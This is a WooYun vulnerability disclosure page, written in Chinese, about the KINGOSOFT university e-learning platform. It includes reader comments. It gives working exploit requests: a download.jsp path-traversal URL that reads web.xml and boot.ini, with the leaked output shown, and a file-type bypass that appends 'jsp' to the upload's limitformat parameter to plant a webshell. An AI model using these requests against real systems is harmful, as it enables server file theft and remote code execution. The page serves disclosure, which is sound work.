KINGOSOFT高校网络教学平台一系列严重问题

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045573

漏洞标题：KINGOSOFT高校网络教学平台一系列严重问题

漏洞作者： if、so

提交时间：2013-12-11 10:13

修复时间：2014-03-08 10:14

公开时间：2014-03-08 10:14

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-11：细节已通知厂商并且等待厂商处理中
2013-12-16：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2014-02-09：细节向核心白帽子及相关领域专家公开
2014-02-19：细节向普通白帽子公开
2014-03-01：细节向实习白帽子公开
2014-03-08：细节向公众公开

简要描述：

KINGOSOFT高校网络教学平台一系列严重问题

详细说明：

KINGOSOFT高校网络教学平台是青果软件的另一产品，发现有严重的安全隐患。
1.文件读取漏洞
这个系统是J2EE开发，我们来访问（实际测试地址不方便放出，因为是学校）

http://test.com/testpath/download.jsp?downfile=WEB-INF/web.xml

得到

ï»¿<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.5"
	xsi:schemaLocation="http://java.sun.com/xml/ns/javaee   http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd">
    <!-- 
	<filter>
		<filter-name>CASFilter</filter-name>
		<filter-class>
			edu.yale.its.tp.cas.client.filter.CASFilter
		</filter-class>
		<init-param>
			<param-name>
				edu.yale.its.tp.cas.client.filter.loginUrl
			</param-name>
			<param-value>
				http://192.168.0.186:8081/cas/login
			</param-value>
		</init-param>
		<init-param>
			<param-name>
				edu.yale.its.tp.cas.client.filter.validateUrl
			</param-name>
			<param-value>
				https://192.168.0.186:8081/cas/proxyValidate
			</param-value>
		</init-param>
		<init-param>
			<param-name>
				edu.yale.its.tp.cas.client.filter.serverName
			</param-name>
			<param-value>192.168.0.186:8081</param-value>
		</init-param>
	</filter>
	<filter-mapping>
		<filter-name>CASFilter</filter-name>
		<url-pattern>/caslogin.jsp</url-pattern>
	</filter-mapping>
 -->
	<filter>
		<filter-name>LoginCheckFilter</filter-name>
		<filter-class>
			com.kingosoft.servlet.wljxpt.ptgl.LoginCheckFilter
		</filter-class>
	</filter>
	<filter-mapping>
		<filter-name>LoginCheckFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<servlet>
		<servlet-name>dwr-invoker</servlet-name>
		<servlet-class>
			org.directwebremoting.servlet.DwrServlet
		</servlet-class>
		<init-param>
			<param-name>activeReverseAjaxEnabled</param-name>
			<param-value>true</param-value>
		</init-param>
		<init-param>
			<param-name>debug</param-name>
			<param-value>true</param-value>
		</init-param>
	</servlet>
	
ã€€  <listener> 
ã€€ã€€    <listener-class>com.kingosoft.servlet.wljxpt.ptgl.MySessionListener</listener-class>
ã€€     </listener>
	
	<jsp-config>
		<taglib>
			<taglib-uri>http://kingosoft.com/tld/ui</taglib-uri>
			<taglib-location>
				/WEB-INF/tld/kingosoft-ui.tld
			</taglib-location>
		</taglib>
	</jsp-config>
	
 ..........以下省略

试试c:\boot.ini,

http://test.com/testpath/download.jsp?downfile=c:boot.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003 Enterprise x64 Edition" /noexecute=optout /fastdetect

2.文件上传，需拥有学生账号登陆

如图，我们用我们的学号登陆进来，（虽然我已毕业一年，但是母校还是对我恋恋不舍），找到课外交流-收发邮件，然后我们新建邮件，看到有一个添加附件，我们来试试上传，

，上面限定了文件类型，我尝试了直接上传，果然不行，然后我打开burpsuite抓包，如图

发现在上传提交时，程序把文件类型当做参数一起提交了，

POST /wljxpt/upload.jsp?limitformat=txt,pdf,gif,jpg,rar,doc,bmp,xls,ppt,mp3&maxfilesize=10485760&dir= HTTP/1.1

果断添加一个jsp，成功上传，上传后的shell url为：http;//test.com/uploadfile/server.jsp,

漏洞证明：

修复方案：

你们更专业

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-03-08 10:14

厂商回复：

漏洞评价：

2013-12-11 10:31 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

一系列？！
2013-12-24 09:22 | 牛博恩 ( 路人 | Rank:21 漏洞数:3 | Oh god my savior)

那个limitformat太明显了。
2013-12-31 12:41 | Windy ( 路人 | Rank:26 漏洞数:10 | 苦逼的民工)

碉堡。。
2013-12-31 15:16 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@牛博恩 limitformat?
2014-01-02 12:00 | 牛博恩 ( 路人 | Rank:21 漏洞数:3 | Oh god my savior)

@wefgod there is an upload link like this form "http://xxxx/upload.jsp?limitformat=gif,jpg,bmp&xxx=xxx".Obviously we can append 'jsp' to that limitformat parameter and upload our webshell.
2014-01-03 09:14 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@牛博恩我以为是教务系统的，刚才仔细一看，不是……
2014-01-22 19:56 | 牛博恩 ( 路人 | Rank:21 漏洞数:3 | Oh god my savior)

@wefgod 表示有一个教务的sql注入洞
2014-01-22 20:49 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@牛博恩教务后面应该都是全局过滤了sql的，是绕过了？要不新版好像不应该有。暂时没研究过
2014-03-10 20:07 | hkmm ( 路人 | Rank:4 漏洞数:4 | 世上女人千千万，实在不行天天换)

@牛博恩求知道。没有发现

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045573

漏洞标题：KINGOSOFT高校网络教学平台一系列严重问题

相关厂商：湖南青果软件有限公司

漏洞作者： if、so

提交时间：2013-12-11 10:13

修复时间：2014-03-08 10:14

公开时间：2014-03-08 10:14

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045573

漏洞标题：KINGOSOFT高校网络教学平台一系列严重问题

相关厂商：湖南青果软件有限公司

漏洞作者： if、so

提交时间：2013-12-11 10:13

修复时间：2014-03-08 10:14

公开时间：2014-03-08 10:14

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-045573"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：